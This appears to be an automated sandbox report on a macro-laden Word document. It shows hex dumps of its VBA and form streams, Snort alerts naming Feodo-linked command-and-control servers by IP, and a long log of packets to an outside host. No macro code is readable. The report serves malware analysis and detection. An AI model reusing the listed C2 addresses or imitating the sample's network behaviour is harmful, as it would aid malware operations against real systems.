Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm5/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm5/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5945

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	5945
Entropy:	5.2694333372
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 1035

General
Stream Path:	Macros/VBA/dir
File Type:	VAX-order 68K Blit (standalone) executable
Stream Size:	1035
Entropy:	6.65461326361
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * l \\ C . . . . v . m . ! O . f f i c . g O
Data Raw:	01 07 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 b2 af d0 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00

Stream Path: WordDocument, File Type: data, Stream Size: 42542

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	42542
Entropy:	3.70237315313
Base64 Encoded:	False
Data ASCII:	. . . . [ . . . . . . . . . . . . . . . . . . . . . . . l . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 6c a0 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a6 00 00 70 61 21 5c 70 61 21 5c 6c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/08/21-18:11:26.387863	TCP	2404314	ET CNC Feodo Tracker Reported CnC Server TCP group 8	49168	80	192.168.2.22	184.66.18.83
01/08/21-18:12:25.548559	TCP	2404308	ET CNC Feodo Tracker Reported CnC Server TCP group 5	49171	443	192.168.2.22	167.71.148.58

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2021 18:11:08.655865908 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:08.845896959 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:08.845983982 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:08.848408937 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.038312912 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.140847921 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.140904903 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.140934944 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.140964985 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.141005993 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.141042948 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.141083002 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.141129971 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.141172886 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.141208887 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.141242981 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.141288042 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.141294956 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.330950975 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331037045 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331068039 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331098080 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331129074 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331167936 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331207991 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331245899 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331284046 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331321001 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331363916 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.331367970 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331396103 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.331402063 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.331410885 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331448078 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331485987 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331490993 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.331525087 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331562042 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331564903 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.331599951 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331625938 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.331640959 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331688881 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331718922 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.331732035 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.331803083 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.332166910 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.521433115 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521506071 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521547079 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521584034 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521584034 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.521624088 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521667004 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521683931 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.521714926 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521758080 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521770954 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.521795034 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521832943 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521852016 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.521871090 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521907091 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521943092 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.521945000 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521981955 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.521996975 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522032022 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522042036 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522074938 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522113085 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522128105 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522151947 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522190094 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522218943 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522226095 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522264957 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522268057 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522301912 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522339106 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522349119 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522391081 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522407055 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522428036 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522468090 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522481918 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522505999 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522542000 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522567034 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522579908 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522617102 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522638083 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522665024 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522706985 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522716999 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522743940 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522782087 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522816896 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522819042 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522855043 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522860050 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522891045 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522908926 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.522927999 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522974968 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.522984028 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.523600101 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.712677956 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.712742090 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.712773085 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.712804079 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.712846041 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.712884903 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.712920904 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.712969065 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713011026 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713048935 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713085890 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713093996 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713124990 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713128090 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713134050 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713162899 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713200092 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713201046 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713238955 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713259935 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713288069 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713330984 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713346004 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713367939 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713442087 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713455915 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713480949 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713517904 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713542938 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713552952 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713592052 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713629007 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713679075 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713716984 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713721037 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713736057 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713757992 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713787079 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713797092 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713838100 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713866949 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713874102 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713893890 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713912964 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713927031 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.713952065 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.713999033 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714018106 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714040995 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714081049 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714106083 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714118958 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714159012 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714190006 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714195967 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714235067 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714262009 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714271069 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714318037 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714333057 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714360952 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714397907 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714432001 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714436054 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714473009 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714505911 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714509010 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714548111 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714575052 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.714585066 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.714677095 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.716656923 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.717746973 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.904619932 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904676914 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904716969 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904756069 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904793978 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904843092 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904886007 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904923916 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.904922962 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.904953003 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.904963017 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905000925 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905008078 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905035973 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905062914 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905075073 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905112028 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905137062 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905159950 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905201912 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905220032 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905240059 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905278921 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905301094 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905316114 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905353069 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905378103 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905420065 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905458927 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905493021 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905493975 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905541897 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905556917 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905585051 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905622005 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905643940 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905661106 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905699968 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905729055 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905738115 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.905778885 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.905826092 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.906095982 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.906138897 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.906203985 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907277107 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907331944 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907370090 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907403946 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907417059 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907461882 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907480001 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907499075 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907537937 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907558918 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907577991 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907613993 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907639027 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907651901 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907694101 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907718897 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907741070 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907783985 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907804966 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907820940 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907857895 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907882929 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907896042 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907931089 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.907960892 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.907968998 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:09.908031940 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.908287048 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:09.909199953 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.095374107 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095426083 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095458031 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095487118 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095516920 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095555067 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095593929 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095630884 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095654964 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.095666885 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095683098 CET	49167	80	192.168.2.22	216.218.207.98
Jan 8, 2021 18:11:10.095707893 CET	80	49167	216.218.207.98	192.168.2.22
Jan 8, 2021 18:11:10.095742941 CET	49167	80	192.168.2.22	216.218.207.98
